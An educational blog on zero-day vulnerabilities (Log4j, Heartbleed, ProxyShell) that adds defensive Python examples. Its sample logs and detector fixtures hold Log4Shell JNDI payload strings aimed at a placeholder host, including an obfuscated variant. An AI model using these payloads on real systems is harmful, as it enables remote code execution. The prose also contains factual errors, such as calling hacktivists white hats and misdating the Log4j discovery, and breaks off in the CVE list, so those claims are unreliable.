Zero Day Exploits


Introduction


Nowadays, being educated about basic cybersecurity terms is a must for everyone, since cybercrimes are increasing exponentially. In today’s blog, we shall be demystifying the term vulnerability.

What is it all about?



According to UPGuard.com, in cybersecurity a vulnerability is a weakness that can be exploited by cybercriminals to gain unauthorized access to a computer system. After exploiting a vulnerability, an attacker can run malicious code, install malware and even steal sensitive data. In simple words, vulnerabilities are loopholes in a piece of software which can be exploited and used for unfair means as long as the problem is left untreated, or in technical terms, until the company comes up with a “patch” or a software update. This is one of the reasons why we should always keep our systems and software updated to the latest version. However, security vulnerabilities are often not discovered straight away, and in recent years hackers have been faster at exploiting vulnerabilities soon after discovery.

The villains



The people who exploit vulnerabilities for their personal gain are malicious actors, who are generally:
  • Cybercriminals – Mostly black hat hackers. Their motivation is usually financial gain.
  • Hacktivists – Hackers motivated by a political or social cause who want their attacks to be visible to draw attention to their cause; also called the “white hat hackers”.
  • Corporate espionage – Those who spy on companies to gain information about them.
  • Cyberwarfare – Countries or political actors spying on or attacking another country's cyberinfrastructure also exploit these vulnerabilities, using them to wage an attack on their nemesis that can affect millions of residents.

The Victims



Hackers generally target the following when they exploit these vulnerabilities, whether in the form of large-scale zero-day attacks or some banking fraud:

  • Individuals who use a vulnerable system, such as a browser or operating system. Hackers can use security vulnerabilities to compromise devices and build large botnets.
  • Individuals with access to valuable business data, such as intellectual property
  • Hardware devices, firmware, and the Internet of Things
  • Large businesses and organizations
  • Government agencies
  • Political targets and/or national security threats
Some real life examples of vulnerabilities



1. Log4j vulnerability


Log4j is a Java-based logging library that is part of the Apache open source project. The software is publicly accessible and is used to collect and store records of activity on a server. It is used mainly for error tracing and debugging: applications write their logs through it and use those logs to troubleshoot. Most companies have been using this library, often indirectly (60+%), for the last 20 years. The major concern is that any Java application using this library can be hacked.

This vulnerability was found in late 2020, though it might have been exploited well before that. Apache's CVSS (Common Vulnerability Scoring System) rating for it is 10/10, because it enables RCE (remote code execution), which allows hackers to run any code they want on our server. The vulnerability has been tagged as the “single biggest, most critical vulnerability of the last decade” and was reported to Apache by Alibaba on November 24, 2021.

Some of the affected companies which had to face the consequences of this unpatched vulnerability are Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent and Twitter.
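The attack described above works because Log4j evaluates `${...}` lookup expressions found in untrusted text that an application logs, such as an HTTP header. The real fix is upgrading Log4j, but a defender also wants to know whether such lookups ever reached their servers. The following is an added example, not code from the original post or from the Log4j project: it scans constructed Apache-style access log lines for lookup expressions in the User-Agent field. Because nested lookups like `${lower:J}` or `${::-j}` collapse to a single character at format time, the scanner normalizes those forms first (handling only these three forms is an assumption of this example); the sample log lines, IP addresses and URL are constructed and not real traffic.

```python
import re
from typing import List, Tuple

# Nested lookups such as ${lower:J}, ${upper:j} or ${::-j} resolve to a plain
# character when Log4j formats the message, so a detector must collapse them
# before matching. Only these three forms are handled here (an assumption of
# this example); any other lookup is left in place and reported as "lookup".
_NESTED = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{::-([^${}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_ANY_LOOKUP = re.compile(r"\$\{")
# Apache-style access line: the User-Agent is the last double-quoted field.
_UA = re.compile(r'"([^"]*)"\s*$')


def _collapse(m: "re.Match") -> str:
    kind, inner, default = m.group(1), m.group(2), m.group(3)
    if default is not None:          # ${::-x} evaluates to its default value x
        return default
    return inner.lower() if kind.lower() == "lower" else inner.upper()


def normalize_lookups(value: str, max_rounds: int = 10) -> str:
    """Collapse nested case/default lookups, innermost first, until stable."""
    for _ in range(max_rounds):
        collapsed = _NESTED.sub(_collapse, value)
        if collapsed == value:
            break
        value = collapsed
    return value


def classify(value: str) -> str:
    """'jndi' for a JNDI lookup, 'lookup' for any other ${...}, else 'clean'."""
    normalized = normalize_lookups(value)
    if _JNDI.search(normalized):
        return "jndi"
    if _ANY_LOOKUP.search(normalized):
        return "lookup"
    return "clean"


def scan_access_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, verdict) for every line whose User-Agent is not clean."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = _UA.search(line)
        if not match:
            continue
        verdict = classify(match.group(1))
        if verdict != "clean":
            findings.append((number, verdict))
    return findings


# Constructed sample log lines (not real traffic); 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2021:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '192.0.2.11 - - [10/Dec/2021:10:00:01 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://example.invalid/x}"',
    '192.0.2.12 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 "${${lower:J}ndi:ldap://example.invalid/x}"',
    '192.0.2.13 - - [10/Dec/2021:10:00:03 +0000] "GET /api HTTP/1.1" 200 "curl/7.79 ${env:HOME}"',
]

if __name__ == "__main__":
    for number, verdict in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Any "lookup" verdict is worth a look even when it is not JNDI: a `${` in a client-supplied header has no legitimate reason to be there, and the same scan can be pointed at any field an application logs, not only the User-Agent.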

2. Heartbleed Vulnerability



The Heartbleed bug in OpenSSL (which runs on 66% of the internet) is probably the largest, most pervasive (and most dangerous) software vulnerability ever discovered, clocking a CVSS score of 10. The root of Heartbleed lies in the SSL standard's heartbeat option, which allows a computer at one end of an SSL connection to send a short message to verify that the other computer is still online and get a response back.

Our web browser needs to check and verify credentials. For safety, companies use OpenSSL, which encodes the user's information so that only the browser and the company's server can interpret it. At the same time, a second conversation called the heartbeat occurs to check if the credentials are correct. The servers have to manage a lot of these socket requests, which gets difficult to maintain, so the servers close the socket connection to save time and resources. To confirm their presence, web browsers send a heartbeat request, and this request is essentially the heart of the Heartbleed problem. A heartbeat is a special data packet containing 1 KB to 64 KB of data.

If the user's side sends a heartbeat message with 1 KB of data, the website server responds with the same amount of data, i.e. 1 KB. Now, if the message claims to carry 64 KB, the website server has to respond with 64 KB of data. That response would include the 1 KB actually sent in the heartbeat message, while the other 63 KB would be collected from the server's memory.

That memory could be garbage, or it could be something valuable like a username or password. The problem is that this vulnerability can be exploited over and over again, i.e. innumerable heartbeat requests with a false data count can be sent, raising the probability of extracting sensitive user information. Some of the companies which were affected by this vulnerability are Tumblr, Google, Yahoo, Intuit (makers of TurboTax), Dropbox, Netflix and Facebook. Amazon.com was not affected, but Amazon Web Services, which is used by a huge number of smaller websites, was affected.
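The length mismatch described above is a plain missing bounds check. The following is an added example, not code from the original post or from OpenSSL: it models a heartbeat record as type (1 byte), payload length (2 bytes), payload and 16 bytes of padding, then runs two handlers over the same constructed memory image. `respond_vulnerable` copies as many bytes as the length field claims, so it returns bytes that lie beyond the record; `respond_fixed` checks that the claimed payload fits inside the received record and discards the message otherwise, which is the shape of the fix. The "neighbouring memory" and the secret inside it are invented for the demonstration.

```python
import struct
from typing import Optional, Tuple

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16   # a heartbeat carries at least 16 bytes of padding

# Constructed stand-in for whatever happened to sit next to the record in the
# server's memory; the values are invented for this demonstration.
NEIGHBOURING_MEMORY = b"...cookie=SESSION-constructed; user=alice; password=example-secret..."


def encode_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Heartbeat body: type(1) | payload_length(2) | payload | padding(>=16).
    claimed_length lets the caller state a payload size larger than what is sent."""
    length = len(payload) if claimed_length is None else claimed_length
    return bytes([HEARTBEAT_REQUEST]) + struct.pack("!H", length) + payload + b"\x00" * MIN_PADDING


def _response(payload: bytes) -> bytes:
    return bytes([HEARTBEAT_RESPONSE]) + struct.pack("!H", len(payload)) + payload + b"\x00" * MIN_PADDING


def respond_vulnerable(memory: bytes, record_len: int) -> bytes:
    """Pre-fix logic: trust the length field and copy that many bytes.
    record_len is received but never consulted, which is the bug."""
    (payload_len,) = struct.unpack("!H", memory[1:3])
    echoed = memory[3:3 + payload_len]      # may run past the record into neighbouring memory
    return _response(echoed)


def respond_fixed(memory: bytes, record_len: int) -> Optional[bytes]:
    """Post-fix logic: the claimed payload must fit inside the received record."""
    if record_len < 1 + 2 + MIN_PADDING:
        return None                          # too short to hold even an empty payload
    (payload_len,) = struct.unpack("!H", memory[1:3])
    if 1 + 2 + payload_len + MIN_PADDING > record_len:
        return None                          # silently discard, as the fix does
    return _response(memory[3:3 + payload_len])


def simulate(payload: bytes, claimed_length: Optional[int] = None) -> Tuple[bytes, Optional[bytes]]:
    """Run both handlers over the same constructed memory image."""
    record = encode_heartbeat(payload, claimed_length)
    memory = record + NEIGHBOURING_MEMORY
    return respond_vulnerable(memory, len(record)), respond_fixed(memory, len(record))


if __name__ == "__main__":
    vulnerable, fixed = simulate(b"hello", claimed_length=100)
    print("vulnerable handler echoed:", vulnerable[3:])
    print("fixed handler returned:", fixed)
```

Note that the fixed handler validates against the number of bytes actually received, not against the maximum heartbeat size: a well-formed 64 KB heartbeat is still answered, while any record whose length field overstates its payload is dropped.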

3. Microsoft Exchange ProxyShell vulnerability



The vulnerabilities lie in the Microsoft Client Access Service (CAS), which is commonly exposed to the public internet and allows users to access email via mobile devices and web browsers. ProxyShell is the umbrella name covering three dangerous vulnerabilities in Microsoft Exchange. Together they enable anyone to bypass authentication and achieve remote code execution as a privileged user. When exploited, these vulnerabilities can leak sensitive information about users, such as a user's distinguished name (DN). Using the leaked DN and SID, the attacker creates a mailbox that contains a draft email with a malicious payload as an attachment. The mailbox and the contained payload are then exported to a web-accessible directory or another directory on the host. By exploiting these vulnerabilities, the hacker can perform remote code execution.

Microsoft Vulnerabilities:

- CVE-2021-34473 — a pre-auth patch confusion issue that results in ACL bypass
- CVE-2021-34523 — an elevation of privilege flaw on the Exchange PowerShell backend
- CVE-2021-31207 — a post-auth arbitrary

How Companies Detect Vulnerabilities



In order to make their systems and software foolproof, companies are always on the lookout for vulnerabilities so that they can fix the issue and patch it as soon as possible, preventing losses to their consumers. Some of the techniques they follow include:

1. Using existing databases of malware and how they behave as a reference.

Although these databases are updated very quickly and can be useful as a reference point, by definition, zero-day exploits are new and unknown. So there’s a limit to how much an existing database can tell you.

2. Signature-based detection

This method employs existing malware databases and their behavior as a reference when scanning for threats; it is possible to use the signatures to detect previously unknown vulnerabilities or attacks.

3. Hybrid detection

This technique merges the above three techniques to take advantage of their strengths while minimizing their weaknesses.

4. Statistics-based detection

Increasingly, machine learning is applied to data from previously recorded exploits to establish a baseline for safe system behavior, built from past and current interactions with the system. The more data is available, the more reliable detection becomes. While this method has limited effectiveness on its own, it usually works well in a hybrid solution.
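To make the signature-based, statistics-based and hybrid approaches above concrete, here is an added example (not code from the original post, and not a real detection product) that combines the two on constructed data. Signature detection matches known patterns against request paths; statistics-based detection compares each client's request count in the current window with that client's own history, using a z-score against a baseline of past windows; the hybrid verdict reports both kinds of reason per client. The baseline counts, client addresses and requests are all constructed, and the signatures, the 3-sigma threshold and the rule that a client without history gets no statistical verdict are choices of this example.

```python
import re
from collections import Counter
from statistics import mean, pstdev
from typing import Dict, List, Sequence, Tuple

Request = Tuple[str, str, str]   # (client, method, path)

# Signature-based: known bad patterns (two chosen for this example).
SIGNATURES = [
    ("log4j-lookup", re.compile(r"\$\{")),
    ("path-traversal", re.compile(r"(\.\./|%2e%2e%2f)", re.IGNORECASE)),
]

# Constructed history: requests per client in each of six past windows.
BASELINE_COUNTS: Dict[str, List[int]] = {
    "192.0.2.10": [12, 14, 11, 13, 12, 15],
    "192.0.2.11": [8, 9, 7, 10, 9, 8],
    "192.0.2.12": [20, 18, 22, 19, 21, 20],
}

# Constructed current window. 198.51.100.7 has no history at all.
CURRENT_WINDOW: List[Request] = (
    [("192.0.2.10", "GET", "/index.html")] * 13
    + [("192.0.2.11", "GET", "/index.html")] * 8
    + [("192.0.2.11", "GET", "/login?user=${jndi:ldap://example.invalid/x}")]
    + [("192.0.2.12", "GET", "/api/items")] * 60
    + [("198.51.100.7", "GET", "/download?file=../../config")] * 5
)


def signature_hits(window: Sequence[Request]) -> Dict[str, set]:
    """Signature-based: map each client to the signature names it triggered."""
    hits: Dict[str, set] = {}
    for client, _method, path in window:
        for name, pattern in SIGNATURES:
            if pattern.search(path):
                hits.setdefault(client, set()).add(name)
    return hits


def anomalous_clients(window: Sequence[Request], baseline: Dict[str, List[int]],
                      threshold: float = 3.0) -> Dict[str, float]:
    """Statistics-based: clients whose request count is more than `threshold`
    standard deviations above their own historical mean."""
    counts = Counter(client for client, _, _ in window)
    flagged: Dict[str, float] = {}
    for client, count in counts.items():
        history = baseline.get(client)
        if not history or len(history) < 2:
            continue                 # no baseline yet: statistics cannot say anything
        mu, sigma = mean(history), pstdev(history)
        if sigma == 0:
            z = float("inf") if count > mu else 0.0
        else:
            z = (count - mu) / sigma
        if z > threshold:
            flagged[client] = round(z, 1)
    return flagged


def hybrid_verdicts(window: Sequence[Request], baseline: Dict[str, List[int]]) -> Dict[str, List[str]]:
    """Hybrid: union of both detectors, with every reason listed per client."""
    signatures = signature_hits(window)
    anomalies = anomalous_clients(window, baseline)
    verdicts: Dict[str, List[str]] = {}
    for client in set(signatures) | set(anomalies):
        reasons = sorted(signatures.get(client, ()))
        if client in anomalies:
            reasons.append(f"rate-anomaly z={anomalies[client]}")
        verdicts[client] = reasons
    return verdicts


if __name__ == "__main__":
    for client, reasons in sorted(hybrid_verdicts(CURRENT_WINDOW, BASELINE_COUNTS).items()):
        print(client, "->", ", ".join(reasons))
```

The example shows the complementary weaknesses the text describes: the client sending a lookup string is caught only by the signature, the client that tripled its request rate is caught only by the statistics, and the brand-new client is caught only because its request happens to match a signature, since there is no history to compare it against.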

Ways to Prevent Vulnerabilities



We can prevent our software from being exploited by hackers by adopting some basic safety features.

1. Upgrading to the latest version of software

Developers keep working towards fixing vulnerabilities and unforeseen bugs, and often manage to deliver patches through new software versions and updates. Keeping up to date ensures you are more secure.

2. Turning on firewall and installing antivirus

Make sure each of your business’s computers is equipped with antivirus and antispyware software that is updated regularly. Such software is readily available online from a variety of vendors. All software vendors regularly provide patches and updates to their products to correct security problems and improve functionality. Firewalls provide protection against outside cyber attackers by shielding your computer or network from malicious or unnecessary network traffic. Firewalls can also prevent malicious software from accessing a computer or network via the internet.

3. Keeping strong passwords

Make sure all your passwords meet the following requirements:

  • 10 characters or more
  • At least one uppercase letter
  • At least one lowercase letter
  • At least one number
  • At least one special character
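A password policy like the one above is only useful if it is enforced at the point where passwords are set. The following is an added example, not code from the original post: a checker that reports which of the five listed requirements a candidate password fails, so the caller can tell the user exactly what to fix. The 10-character minimum and the other four rules come from the list above; treating Python's `string.punctuation` set as the definition of "special character" is an assumption of this example.

```python
import string
from typing import List

MIN_LENGTH = 10                      # "10 characters or more"
SPECIAL = set(string.punctuation)    # assumption: what counts as a special character


def password_failures(password: str) -> List[str]:
    """Return the names of the requirements the password does not meet (empty if all pass)."""
    checks = [
        ("length", len(password) >= MIN_LENGTH),
        ("uppercase", any(c.isupper() for c in password)),
        ("lowercase", any(c.islower() for c in password)),
        ("digit", any(c.isdigit() for c in password)),
        ("special", any(c in SPECIAL for c in password)),
    ]
    return [name for name, passed in checks if not passed]


def meets_policy(password: str) -> bool:
    """True only when every requirement in the list is satisfied."""
    return not password_failures(password)


if __name__ == "__main__":
    for candidate in ("short1!A", "alllowercase12!", "Correct-Horse-7"):
        print(repr(candidate), "->", password_failures(candidate) or "ok")
```

Reporting every failed rule at once, rather than stopping at the first one, keeps the user from having to resubmit several times; the checker is also trivially extended with further rules, such as rejecting passwords found in a breach list.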

4. Not opening suspicious emails which might be potential phishing scams

Don’t click on a link or email if it:

1. Seems urgent for no reason

2. Uses language or grammar that doesn’t feel right or familiar

3. Asks for sensitive information

Conclusion


As of Dec. 9, 2021, the number of vulnerabilities found in production code for the year is 18,400. Breaking down that statistic for 2021 so far, NIST recorded 2,966 low-risk vulnerabilities, 11,777 medium-risk ones, and 3,657 of a high-risk nature. For 2020, the total number of vulnerabilities was 18,351. Hence, it’s important to have a basic knowledge about the issue of vulnerabilities. We hope that our blog was able to throw some light on vulnerabilities in the cybersecurity world.

Authors:

Dhriti Dey
Atharv Agarwal
